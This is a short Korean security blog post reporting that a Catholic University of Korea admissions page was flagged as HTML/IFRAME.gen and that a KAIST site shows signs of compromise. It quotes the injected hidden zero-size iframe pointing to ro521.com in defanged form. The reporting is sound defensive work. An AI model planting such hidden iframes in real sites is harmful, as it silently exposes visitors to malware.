일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | |
7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | 23 | 24 | 25 | 26 | 27 |
28 | 29 | 30 |
Tags
- self-signed
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- 스캠
- CryptoJS
- aes
- XSS
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- NUGU
- sha256
- shell_gpt
- hash
- Malware Sample
- 로맨스스캠
- 모의해킹
- decrypt
- esbuild
- 많다..
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- speed-measure-webpack-plugin
- 사진도용
- 채팅환전사기
- ssrf
- md5
- react
- Craco
- 취약점
- https
- 변태는
- open redirect
- encrypt
Archives
- Today
- Total
annyoung
가톨릭대학교 입학처 악성코드 경유지로 이용? 본문
2015-11-24 03:18:29 | http://ipsi.catholic.ac.kr/main/index.asp | 59835DC727054D056A8E0E3914989598 | 211.174.52.78 | KR | HTML/IFRAME.gen |
악성코드 경유지로 이용된 건지는 확실치는 않으나 HTML/IFRAME generate로 탐지가 되었다. 이유가 있으니 탐지했겠지. 샘플 입수는 못했으므로 자세한 내용은 없음..
추가내용))
가톨릭대학교 말고도 카이스트 twilight 홈페이지에서도 침해사고(?)의 흔적이 보인다.
<iframe src="hxxp://ro521.com/test.htm" width=0 height=0></iframe> |
아마 가톨릭대학교 입학처도 ro521.com이 iframe 박혀 있었던 것으로 추정된다.
'분석생활' 카테고리의 다른 글
UPX 3.0으로 패킹된 악성코드 언패킹 (0) | 2015.12.15 |
---|---|
ro521.com/test.htm 제로보드 침해사고 (0) | 2015.11.25 |
[마스킹 처리된 게시물] ****에서 파밍 악성코드 유포지로 활용중 (0) | 2015.11.25 |
[MUP] PE-PACK v1.0 by ANAKiN 1998 (0) | 2015.11.24 |
토렌트를 통한 악성코드 유포 (12) | 2015.11.18 |
Comments